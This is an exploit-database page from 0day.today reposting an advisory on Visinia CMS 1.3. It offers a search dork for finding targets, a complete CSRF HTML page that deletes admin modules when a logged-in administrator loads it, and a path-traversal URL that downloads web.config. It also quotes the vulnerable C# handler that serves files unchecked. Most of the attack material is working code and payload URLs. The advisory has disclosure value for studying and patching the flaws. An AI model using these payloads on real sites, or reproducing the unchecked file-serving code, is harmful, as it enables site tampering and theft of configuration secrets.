0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Visinia 1.3 Multiple Vulnerabilities
==================================== Visinia 1.3 Multiple Vulnerabilities ==================================== Title : Visinia Multiple Vulnerabilities Affected Version : Visinia 1.3 Discovery : www.abysssec.com Vendor : http://www.visinia.com/ Download Links : http://visinia.codeplex.com/releases Dork : "Powered by visinia" Admin Page : http://Example.com/Login.aspx Description : =========================================================================================== This version of Visinia have Multiple Valnerabilities : 1- CSRF for Remove Modules 2- LFI for download web.config or any file CSRF for Remove Modules: =========================================================================================== With this vulnerability you can navigate the admin to visit malicious site (when he is already logged in) to remove a Module with a POST request to server. In this path the Module will be removed: http://Example.com/Admin/Pages/System/Modules/ModuleController.aspx?DeleteModule=True&ModuleId=159 for removing other modules you need to just change ModuleId. The Source of HTML Page (Malicious script) is here: ---------------------------------------------------------------------------------------- <html> <head> <title >Wellcome to My Site!</title> Hello! ... ... ... This page remove Modules in Visinia CMS. <script> function RemoveModule() { try { netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect"); } catch (e) {} var http = false; if (window.XMLHttpRequest) { http = new XMLHttpRequest(); } else if (window.ActiveXObject) { http = new ActiveXObject("Microsoft.XMLHTTP"); } url = "http://Example.com/Admin/Pages/System/Modules/ModuleController.aspx?DeleteModule=True&ModuleId=159"; http.onreadystatechange = done; http.open('POST', url, true); http.send(null); } function done() { if (http.readyState == 4 && http.status == 200) { } } </script> </head> <body onload ="RemoveModule();"> </body> </html> ---------------------------------------------------------------------------------------- File Disclosure Vulnerability: =========================================================================================== using this path you can download web.config file from server. http://Example.com/image.axd?picture=viNews/../../web.config The downloaded file is image.axd, while after downloading you find that the content of image.axd is web.config. Vulnerable Code is in this DLL : visinia.SmartEngine.dll and this Method : ProcessRequest(HttpContext context) -------------------------------------------------------------------- public void ProcessRequest(HttpContext context) { if (!string.IsNullOrEmpty(context.Request.QueryString["picture"])) { string fileName = context.Request.QueryString["picture"]; // Give the file from URL string folder = WebRoots.GetResourcesRoot(); try { FileInfo fi = new FileInfo(context.Server.MapPath(folder) + fileName); int index = fileName.LastIndexOf(".") + 1; string extension = fileName.Substring(index).ToLower(); if (string.Compare(extension, "jpg") == 0) { context.Response.ContentType = "image/jpeg"; } else { context.Response.ContentType = "image/" + extension; } context.Response.TransmitFile(fi.FullName); // Put the file in 'Response' for downloading without any check } catch { } } } # 0day.today [2024-09-28] #